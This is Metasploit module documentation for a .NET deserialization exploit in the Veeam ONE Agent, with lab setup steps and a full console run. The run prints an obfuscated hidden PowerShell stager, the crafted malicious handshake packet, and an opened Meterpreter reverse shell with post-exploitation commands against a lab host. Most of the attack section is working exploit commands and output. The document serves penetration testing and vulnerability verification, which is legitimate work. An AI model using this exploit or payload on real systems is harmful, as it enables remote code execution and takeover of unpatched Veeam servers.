## Vulnerable Application ### Description This module exploits a .NET deserialization vulnerability in the Veeam ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the 9 and 10 release lines. Specifically, the module targets the `HandshakeResult()` method used by the Agent. By inducing a failure in the handshake, the Agent will deserialize untrusted data. Tested against the pre-patched release of 10.0.0.750. Note that Veeam continues to distribute this version but with the patch pre-applied. ### Setup 1. Download the [pre-patched 10.0.0.750 ISO](https://download2.veeam.com/VeeamONE.10.0.0.750.iso) 2. Mount the ISO in a 64-bit copy of Windows (I used Windows 10 x64) 3. Run `Setup.exe` and follow the prompts to install the software You can reference Veeam's [quick start guide](https://helpcenter.veeam.com/docs/one/qsg/installation.html?ver=100). The service may take up to several minutes to start, even if you can connect to it, so please be patient. ## Verification Steps Follow [Setup](#setup) and [Scenarios](#scenarios). ## Targets ### 0 This executes a Windows command. ### 1 This uses a Windows dropper to execute code. ### 2 This uses a PowerShell stager to execute code. ## Options ### HOSTINFO_NAME This is the name sent in the host info packet to the server. It must be recognized by the server. You shouldn't need to change this, but you may if your environment is different. ## Scenarios ### Veeam ONE Agent 10.0.0.750 on Windows 10 x64 ``` msf5 > use exploit/windows/misc/veeam_one_agent_deserialization msf5 exploit(windows/misc/veeam_one_agent_deserialization) > options Module options (exploit/windows/misc/veeam_one_agent_deserialization): Name Current Setting Required Description ---- --------------- -------- ----------- HOSTINFO_NAME AgentController yes Name to send in host info (must be recognized by server!) RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 2805 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 2 PowerShell Stager msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set rhosts 172.16.249.150 rhosts => 172.16.249.150 msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set lhost 172.16.249.1 lhost => 172.16.249.1 msf5 exploit(windows/misc/veeam_one_agent_deserialization) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] 172.16.249.150:2805 - Connecting to 172.16.249.150:2805 [*] 172.16.249.150:2805 - Sending host info to 172.16.249.150:2805 [+] 172.16.249.150:2805 - --> Host info packet: "\x05\x02\x0FAgentController" [+] 172.16.249.150:2805 - <-- Host info reply: "\x03\x02\x00" [*] 172.16.249.150:2805 - Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp [*] 172.16.249.150:2805 - Powershell command length: 2506 [*] 172.16.249.150:2805 - Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" [*] 172.16.249.150:2805 - Sending malicious handshake to 172.16.249.150:2805 [+] 172.16.249.150:2805 - --> Handshake packet: "\x9E\f\x00\x00\a\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x00\x00\x00\x00\f\x02\x00\x00\x00^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\x05\x01\x00\x00\x00BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties\x01\x00\x00\x00\x0FForegroundBrush\x01\x02\x00\x00\x00\x06\x03\x00\x00\x00\xBC\x17cmd/c powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"\v" [+] 172.16.249.150:2805 - <-- Handshake reply: "\x00\x00\x00\x00\xBA\xB0\x8DJ\xA2A\eL\x9E\xD3r\xB4w\xD3\xEFn\x0E\x00\x00\x00\a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00" [*] Sending stage (201283 bytes) to 172.16.249.150 [*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.150:49725) at 2020-04-28 01:06:47 -0500 meterpreter > getuid Server username: WINDEV2004EVAL\User meterpreter > sysinfo Computer : WINDEV2004EVAL OS : Windows 10 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 21 Meterpreter : x64/windows meterpreter > ```